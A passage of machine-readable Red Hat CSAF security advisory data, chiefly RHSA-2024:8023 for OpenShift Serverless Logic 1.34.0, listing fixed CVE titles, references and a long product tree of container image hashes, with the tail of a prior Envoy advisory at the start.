"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "envoy: Envoy crashes for `LocalReply` in HTTP async client"
}
]
}
rhsa-2024_8023
Vulnerability from csaf_redhat
Published
2024-10-14 00:59
Modified
2024-11-06 07:13
Summary
Red Hat Security Advisory: Release of OpenShift Serverless Logic 1.34.0 security update & enhancements
Notes
Topic
Release of OpenShift Serverless Logic 1.34.0
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
Details
This release includes security, bug fixes, and enhancements.
Security Fix(es):
* axios: axios: Server-Side Request Forgery (CVE-2024-39338)
* express: Improper Input Handling in Express Redirects (CVE-2024-43796)
* io.vertx/vertx-grpc-client: Vertx gRPC server does not limit the maximum message size (CVE-2024-8391)
* io.vertx/vertx-grpc-server: Vertx gRPC server does not limit the maximum message size (CVE-2024-8391)
* send: Code Execution Vulnerability in Send Library (CVE-2024-43799)
* serve-static: Improper Sanitization in serve-static (CVE-2024-43800)
* webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule (CVE-2024-43788)
For more details about the security issues, including the impact, a CVSS score, acknowledgements, and other related information, refer to the CVE pages listed in the References section.
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Release of OpenShift Serverless Logic 1.34.0\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.",
"title": "Topic"
},
{
"category": "general",
"text": "This release includes security, bug fixes, and enhancements.\n\nSecurity Fix(es):\n\n* axios: axios: Server-Side Request Forgery (CVE-2024-39338)\n\n* express: Improper Input Handling in Express Redirects (CVE-2024-43796)\n\n* io.vertx/vertx-grpc-client: Vertx gRPC server does not limit the maximum message size (CVE-2024-8391)\n\n* io.vertx/vertx-grpc-server: Vertx gRPC server does not limit the maximum message size (CVE-2024-8391)\n\n* send: Code Execution Vulnerability in Send Library (CVE-2024-43799)\n\n* serve-static: Improper Sanitization in serve-static (CVE-2024-43800)\n\n* webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule (CVE-2024-43788)\n\nFor more details about the security issues, including the impact, a CVSS score, acknowledgements, and other related information, refer to the CVE pages listed in the References section.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2024:8023",
"url": "https://access.redhat.com/errata/RHSA-2024:8023"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#important",
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"category": "external",
"summary": "2308193",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2308193"
},
{
"category": "external",
"summary": "2309758",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2309758"
},
{
"category": "external",
"summary": "2311152",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311152"
},
{
"category": "external",
"summary": "2311153",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311153"
},
{
"category": "external",
"summary": "2311154",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311154"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_8023.json"
}
],
"title": "Red Hat Security Advisory: Release of OpenShift Serverless Logic 1.34.0 security update \u0026 enhancements",
"tracking": {
"current_release_date": "2024-11-06T07:13:54+00:00",
"generator": {
"date": "2024-11-06T07:13:54+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.1.1"
}
},
"id": "RHSA-2024:8023",
"initial_release_date": "2024-10-14T00:59:58+00:00",
"revision_history": [
{
"date": "2024-10-14T00:59:58+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2024-10-14T00:59:58+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2024-11-06T07:13:54+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "8Base-Openshift-Serverless-1.34",
"product": {
"name": "8Base-Openshift-Serverless-1.34",
"product_id": "8Base-RHOSS-1.34",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:openshift_serverless:1.34::el8"
}
}
}
],
"category": "product_family",
"name": "Red Hat OpenShift Serverless"
},
{
"branches": [
{
"category": "product_version",
"name": "openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64",
"product": {
"name": "openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64",
"product_id": "openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64",
"product_identification_helper": {
"purl": "pkg:oci/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2?arch=amd64\u0026repository_url=registry.redhat.io/openshift-serverless-1/logic-data-index-ephemeral-rhel8\u0026tag=1.34.0-6"
}
}
},
{
"category": "product_version",
"name": "openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64",
"product": {
"name": "openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64",
"product_id": "openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64",
"product_identification_helper": {
"purl": "pkg:oci/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03?arch=amd64\u0026repository_url=registry.redhat.io/openshift-serverless-1/logic-data-index-postgresql-rhel8\u0026tag=1.34.0-6"
}
}
},
{
"category": "product_version",
"name": "openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64",
"product": {
"name": "openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64",
"product_id": "openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64",
"product_identification_helper": {
"purl": "pkg:oci/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1?arch=amd64\u0026repository_url=registry.redhat.io/openshift-serverless-1/logic-jobs-service-ephemeral-rhel8\u0026tag=1.34.0-5"
}
}
},
{
"category": "product_version",
"name": "openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64",
"product": {
"name": "openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64",
"product_id": "openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64",
"product_identification_helper": {
"purl": "pkg:oci/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe?arch=amd64\u0026repository_url=registry.redhat.io/openshift-serverless-1/logic-jobs-service-postgresql-rhel8\u0026tag=1.34.0-6"
}
}
},
{
"category": "product_version",
"name": "openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64",
"product": {
"name": "openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64",
"product_id": "openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64",
"product_identification_helper": {
"purl": "pkg:oci/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47?arch=amd64\u0026repository_url=registry.redhat.io/openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8\u0026tag=1.34.0-2"
}
}
},
{
"category": "product_version",
"name": "openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64",
"product": {
"name": "openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64",
"product_id": "openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64",
"product_identification_helper": {
"purl": "pkg:oci/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442?arch=amd64\u0026repository_url=registry.redhat.io/openshift-serverless-1/logic-management-console-rhel8\u0026tag=1.34.0-5"
}
}
},
{
"category": "product_version",
"name": "openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64",
"product": {
"name": "openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64",
"product_id": "openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64",
"product_identification_helper": {
"purl": "pkg:oci/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314?arch=amd64\u0026repository_url=registry.redhat.io/openshift-serverless-1/logic-operator-bundle\u0026tag=1.34.0-5"
}
}
},
{
"category": "product_version",
"name": "openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64",
"product": {
"name": "openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64",
"product_id": "openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64",
"product_identification_helper": {
"purl": "pkg:oci/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb?arch=amd64\u0026repository_url=registry.redhat.io/openshift-serverless-1/logic-rhel8-operator\u0026tag=1.34.0-5"
}
}
},
{
"category": "product_version",
"name": "openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64",
"product": {
"name": "openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64",
"product_id": "openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64",
"product_identification_helper": {
"purl": "pkg:oci/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391?arch=amd64\u0026repository_url=registry.redhat.io/openshift-serverless-1/logic-swf-builder-rhel8\u0026tag=1.34.0-6"
}
}
},
{
"category": "product_version",
"name": "openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64",
"product": {
"name": "openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64",
"product_id": "openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64",
"product_identification_helper": {
"purl": "pkg:oci/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d?arch=amd64\u0026repository_url=registry.redhat.io/openshift-serverless-1/logic-swf-devmode-rhel8\u0026tag=1.34.0-6"
}
}
}
],
"category": "architecture",
"name": "amd64"
},
{
"branches": [
{
"category": "product_version",
"name": "openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64",
"product": {
"name": "openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64",
"product_id": "openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64",
"product_identification_helper": {
"purl": "pkg:oci/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03?arch=arm64\u0026repository_url=registry.redhat.io/openshift-serverless-1/logic-data-index-ephemeral-rhel8\u0026tag=1.34.0-6"
}
}
},
{
"category": "product_version",
"name": "openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64",
"product": {
"name": "openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64",
"product_id": "openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64",
"product_identification_helper": {
"purl": "pkg:oci/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64?arch=arm64\u0026repository_url=registry.redhat.io/openshift-serverless-1/logic-data-index-postgresql-rhel8\u0026tag=1.34.0-6"
}
}
},
{
"category": "product_version",
"name": "openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64",
"product": {
"name": "openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64",
"product_id": "openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64",
"product_identification_helper": {
"purl": "pkg:oci/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6?arch=arm64\u0026repository_url=registry.redhat.io/openshift-serverless-1/logic-jobs-service-ephemeral-rhel8\u0026tag=1.34.0-5"
}
}
},
{
"category": "product_version",
"name": "openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64",
"product": {
"name": "openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64",
"product_id": "openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64",
"product_identification_helper": {
"purl": "pkg:oci/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f?arch=arm64\u0026repository_url=registry.redhat.io/openshift-serverless-1/logic-jobs-service-postgresql-rhel8\u0026tag=1.34.0-6"
}
}
},
{
"category": "product_version",
"name": "openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64",
"product": {
"name": "openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64",
"product_id": "openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64",
"product_identification_helper": {
"purl": "pkg:oci/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1?arch=arm64\u0026repository_url=registry.redhat.io/openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8\u0026tag=1.34.0-2"
}
}
},
{
"category": "product_version",
"name": "openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64",
"product": {
"name": "openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64",
"product_id": "openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64",
"product_identification_helper": {
"purl": "pkg:oci/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba?arch=arm64\u0026repository_url=registry.redhat.io/openshift-serverless-1/logic-operator-bundle\u0026tag=1.34.0-5"
}
}
},
{
"category": "product_version",
"name": "openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64",
"product": {
"name": "openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64",
"product_id": "openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64",
"product_identification_helper": {
"purl": "pkg:oci/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28?arch=arm64\u0026repository_url=registry.redhat.io/openshift-serverless-1/logic-rhel8-operator\u0026tag=1.34.0-5"
}
}
},
{
"category": "product_version",
"name": "openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64",
"product": {
"name": "openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64",
"product_id": "openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64",
"product_identification_helper": {
"purl": "pkg:oci/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0?arch=arm64\u0026repository_url=registry.redhat.io/openshift-serverless-1/logic-swf-builder-rhel8\u0026tag=1.34.0-6"
}
}
},
{
"category": "product_version",
"name": "openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64",
"product": {
"name": "openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64",
"product_id": "openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64",
"product_identification_helper": {
"purl": "pkg:oci/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9?arch=arm64\u0026repository_url=registry.redhat.io/openshift-serverless-1/logic-swf-devmode-rhel8\u0026tag=1.34.0-6"
}
}
}
],
"category": "architecture",
"name": "arm64"
},
{
"branches": [
{
"category": "product_version",
"name": "openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le",
"product": {
"name": "openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le",
"product_id": "openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-serverless-1/logic-data-index-ephemeral-rhel8\u0026tag=1.34.0-6"
}
}
},
{
"category": "product_version",
"name": "openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le",
"product": {
"name": "openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le",
"product_id": "openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-serverless-1/logic-data-index-postgresql-rhel8\u0026tag=1.34.0-6"
}
}
},
{
"category": "product_version",
"name": "openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le",
"product": {
"name": "openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le",
"product_id": "openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-serverless-1/logic-jobs-service-ephemeral-rhel8\u0026tag=1.34.0-5"
}
}
},
{
"category": "product_version",
"name": "openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le",
"product": {
"name": "openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le",
"product_id": "openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-serverless-1/logic-jobs-service-postgresql-rhel8\u0026tag=1.34.0-6"
}
}
},
{
"category": "product_version",
"name": "openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le",
"product": {
"name": "openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le",
"product_id": "openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-serverless-1/logic-operator-bundle\u0026tag=1.34.0-5"
}
}
},
{
"category": "product_version",
"name": "openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le",
"product": {
